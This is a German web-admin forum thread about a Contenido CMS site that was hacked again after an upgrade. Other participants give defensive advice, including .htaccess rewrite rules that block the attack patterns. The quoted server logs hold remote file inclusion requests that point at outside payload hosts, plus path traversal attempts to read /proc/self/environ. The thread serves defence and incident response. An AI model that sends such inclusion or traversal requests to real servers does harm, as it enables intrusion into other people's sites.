4.8.15 Sicherheitsupdate hat nichts genützt - hack

[sandra07]

Nachdem eine Site gehackt wurde habe ich sofort das Contenido 4.8.12 auf die Version 4.8.15 upgedatet. Leider ohne Erfolg. Wenige Stunden nach dem Update gings schon wieder los mit den Angriffen und hat die Website wieder lahm gelegt.

Auf der Website erscheint nur noch:
Warning: chdir() [function.chdir]: Permission denied (errno 13) in /home3/www/domain/cms/front_content.php on line 91
Warning: chdir() [function.chdir]: Permission denied (errno 13) in /home3/www/domain/contenido/includes/pseudo-cron.inc.php on line 172
Warning: Cannot modify header information - headers already sent by (output started at /home3/www/domain/cms/front_content.php:91) in /home3/www/domain/conlib/session.inc on line 508

Im Logfile fand ich tägliche Einträge die so oder ähnlich aussehen:
213.208.134.74 - - [23/May/2011:09:25:33 +0200] "GET /kiosk//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.vipekaem.ru/images/vero.jpg?? HTTP/1.1" 403 253 "-" "libwww-perl/5.805"
213.208.134.74 - - [23/May/2011:09:25:33 +0200] "GET //contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.vipekaem.ru/images/vero.jpg?? HTTP/1.1" 403 247 "-" "libwww-perl/5.805"
70.32.83.230 - - [25/May/2011:05:18:32 +0200] "GET /kiosk//contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=http://www.vipekaem.ru/images/vero.jpg?? HTTP/1.1" 403 260 "-" "libwww-perl/5.805"

Hat jemand eine Idee was ich noch tun könnte?
Danke im Voraus und Gruss

Version 4.8.15 mit AMR 0.5.5

[Oldperl]

Hallo Sandra,

Site erstmal offline nehmen (.htaccess).
Datenbank auf Befall prüfen und wenn diese sauber ist Contenido blank installieren, Setup (Update, Migration) über die DB machen und dann händisch alle benötigten zusätzlichen Dateien aus dem gesicherten (befallenen) Contenido nach Prüfung auf Befall rüber kopieren.

Gruß aus Franken

Ortwin

[sandra07]

Danke, habe ich bereits gemacht. Leider schon wieder daselbe Problem...

[Dodger77]

Um da zu versuchen, Licht ins Dunkel zu bringen:

Die Lücke, die mit der 4.8.15 geschlossen wurde, bestand so noch nicht in der 4.8.12. Der Angriffweg aus dem Logfile war - zumindest nach den Zeilen, die gepostet wurden - nicht erfolgreich (Statuscode 403). Es müsste also eine andere Lücke gewesen sein.

Zu dem Upgrade auf 4.8.15 ist natürlich die Frage, ob die Dateien aus der 4.8.15 einfach nur über die alte Installation geschrieben wurden. Dann wären ggf. gehackte Dateien oder durch den Hack angelegte Dateien mit Sicherheit noch vorhanden.

[Oldperl]

Danke, habe ich bereits gemacht. Leider schon wieder daselbe Problem...

Hast du auch alle Zugänge geändert? DB, FTP, etc. Passwörter ändern, evtl., wenn möglich, neue Usernamen.
Keine alten Dateien von außen zugänglich auf dem Web liegen lassen!!!
Evtl. auch mal in den Serverlogs nach verdächtigen Einträgen schaun, wobei, wenn die alte Version schon "verseucht" war ist hier natürlich der Zeitraum schwer einzugrenzen.
Jedoch gab es wohl offensichtlich erneute Zugriffe nach dem Upgrade, also diesen Zeitraum checken. So kann man versuchen den Zugriffsweg heraus zu bekommen um die Lücke zu stopfen.
Auch Crossdomain-Zugriffe nicht vergessen, wenn mehrere Domains gehostete werden, oder man auf nem vServer liegt kann auch sowas der Grund sein.

Gruß Ortwin

[xmurrix]

...Nachdem eine Site gehackt wurde habe ich sofort das Contenido 4.8.12 auf die Version 4.8.15 upgedatet. Leider ohne Erfolg. Wenige Stunden nach dem Update gings schon wieder los mit den Angriffen und hat die Website wieder lahm gelegt.

Version 4.8.15 mit AMR 0.5.5...

Hallo sandra07,

füge bitte der .htaccess Datei, die mit dem AMR-Plugin mitgeliefert wird, folgende Zeile ein:

Code: Alles auswählen

RewriteCond %{QUERY_STRING} cfg\[path\].*=.*$  [NC,OR]

Am besten ist es, wenn folgende Regeln darin vorkommen:

Code: Alles auswählen

RewriteCond %{QUERY_STRING} contenido_path=.*$  [NC,OR]
RewriteCond %{QUERY_STRING} cfg\[path\]=.*$  [NC,OR]
RewriteCond %{QUERY_STRING} cfg\[path\].*=.*$  [NC,OR]
RewriteCond %{QUERY_STRING} _PHPLIB\[libdir\]=.*$  [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} ftp://.*$  [NC]
RewriteCond %{QUERY_STRING} http[s]*://.*$ [NC]
RewriteRule ^.* - [F,L]  # all matching conditions from above will end in nirvana

Das sollte dein Problem vorerst lösen und wir versuchen die Lücke zu schließen.

Grüße
xmurrix

[sandra07]

Hallo zusammen, danke für die Feedbacks.
Dann werde ich mich nochmals an die Arbeit machen...

[sandra07]

Hallo zusammen
In der Datenbank selber habe ich nichts "verseuchtes" gefunden. Habe aber die Punkte abgearbeitet. In der .htaccess Datei des AMR habe ich die Zeile ergänzt und dann die Site wieder online gestellt. Am ersten Tag konnte ich in den Logfiles tatsächlich nichts mehr verdächtiges finden. Am zweiten Tag fand ich folgende Zugriffe

190.2.33.189 - - [01/Jun/2011:06:45:07 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spa24hours.eu/store/images/images/id/myid.jpg? HTTP/1.1" 403 264 "-" "libwww-perl/5.836"

190.2.33.189 - - [01/Jun/2011:06:45:11 +0200] "GET /intern//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spa24hours.eu/store/images/images/id/myid.jpg? HTTP/1.1" 403 271 "-" "libwww-perl/5.836"

190.2.33.189 - - [01/Jun/2011:06:46:46 +0200] "GET /gaestebuch//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 403 275 "-" "libwww-perl/5.836"

190.2.33.189 - - [01/Jun/2011:06:46:47 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 403 264 "-" "libwww-perl/5.836"

190.2.33.189 - - [01/Jun/2011:06:46:57 +0200] "GET /intern//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 403 271 "-" "libwww-perl/5.836"

Scheint so, dass nun über Newsletter versucht wird anzugreifen.

[Dodger77]

Ja, der Versuch ist durchaus gemacht worden. Allerdings wie in den Logfile-Auszügen oben auch gab das einen 403er, war also nicht erfolgreich. Der Angriff über diese Datei ist ziemlich alt (ca. 2 Jahre) und war noch in der 4.8.5 und 4.6.23 möglich.

[sandra07]

Ja das stimmt. Ich werde das ganze nun noch ein paar Tage näher beobachten und hoffe dass nun alle Angriffe erfolglos bleiben.
Danke nochmals für die Feedbacks und schöne Auffahrt allerseits!

[sandra07]

Hallo zusammen
Heute habe ich unter anderem das gefunden:
200.6.118.162 - - [02/Jun/2011:13:08:20 +0200] "GET /intern/index.html/errors.php?error=test?? HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.6.118.162 - - [02/Jun/2011:13:08:21 +0200] "GET /willkommen/index.html HTTP/1.1" 200 7616 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.6.118.162 - - [02/Jun/2011:13:08:23 +0200] "GET /intern/index.html/errors.php?error=http://www.astrindo.co.id/images/storie ... ./copy.jpg?? HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.6.118.162 - - [02/Jun/2011:13:08:25 +0200] "GET /willkommen/index.html HTTP/1.1" 200 7616 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.6.118.162 - - [02/Jun/2011:13:08:27 +0200] "GET /intern/index.html/errors.php?error=http://www.astrindo.co.id/images/storie ... /paste.jpg?? HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.6.118.162 - - [02/Jun/2011:13:08:28 +0200] "GET /willkommen/index.html HTTP/1.1" 200 7616 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.6.118.162 - - [02/Jun/2011:13:08:31 +0200] "GET /intern/errors.php?error=test?? HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.6.118.162 - - [02/Jun/2011:13:08:32 +0200] "GET /willkommen/index.html HTTP/1.1" 200 7616 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.6.118.162 - - [02/Jun/2011:13:08:38 +0200] "GET /intern/errors.php?error=http://www.astrindo.co.id/images/storie ... /paste.jpg?? HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.6.118.162 - - [02/Jun/2011:13:08:49 +0200] "GET /kiosk/index.html//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 200 25 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
200.6.118.162 - - [02/Jun/2011:13:08:50 +0200] "GET /gaestebuch/gaestebuch.html?start=25//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 200 11335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"

"Intern" sind die geschützten Seiten für Mitglieder. Kann man das Newsletter Plugin irgendwie deinstallieren oder kann ich diese newsletter-jobs einfach mal löschen (der Newsletter ist nicht im Einsatz).

[xmurrix]

Morgen sandra07,

eigentlich sollte die eine Regel

Code: Alles auswählen

RewriteCond %{QUERY_STRING} cfg\[path\].*=.*$  [NC,OR]

Request mit solchen Werten unterbinden. Hast du auch alle nötigen Regeln zum Abfanger solcher Request in die .htaccess eingebaut?

Rest folgt per PN..

Gruß
xmurrix

[sandra07]

Hallo xmurrix
Ja, ich habe alle obigen Sachen abgearbeitet, dort war auch diese Zeile.
Meine aktuelle .htacess:
RewriteCond %{QUERY_STRING} contenido_path=.*$ [NC,OR]
RewriteCond %{QUERY_STRING} cfg\[path\]=.*$ [NC,OR]
RewriteCond %{QUERY_STRING} cfg\[path\].*=.*$ [NC,OR]
RewriteCond %{QUERY_STRING} _PHPLIB\[libdir\]=.*$ [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} ftp://.*$ [NC]
RewriteCond %{QUERY_STRING} http[s]*://.*$ [NC]
RewriteRule ^.* - [F,L] # all matching conditions from above will end in nirvana

[rethus]

Aller erster Ansatz sollte sein, dein php so zu konfigurieren, das externe links nicht in include-anweisungen verwendet werden können:

Code: Alles auswählen

allow_url_fopen

Als nächstes epmfehle ic den Adminbereich durch .htaccess-Passwortschutz abzuriegeln.
Dann FTP (und sämtliche andere) Passwörter neu - alphanumerisch mit sonderzeichen - vergeben.

Hast du nen eigenen Server gibt es zudem noch einige andere Ansatzpunkte.

Damit hast du schon mal 90% der Miete.
Kann deinen Server gerne für dich absichern, bzw. dich aktiv dabei unterstützen. Schick mir bei Interesse einfach ne PN.

[sandra07]

Hallo rethus

Danke für deine Erläuterungen. Das hatte ich schon alles vor dem Angriff getan (ausser dem htaccess-Schutz des Admin-Bereichs) aber eingeloggt hat sich niemand, ausser den Administratoren. Wie bereits geschrieben habe ich auch sämtliche Passwörter geändert aber eben 90 % waren in diesem Fall zu wenig...

Bis jetzt sieht es eigentlich ganz gut aus.... habe also zurzeit keinen Handlungsbedarf ausser der Statistik, die nicht läuft wenn der Cronjob Ordner nicht die vollen Rechte (777) hat und so mutig war ich noch nicht diesem 777 zu geben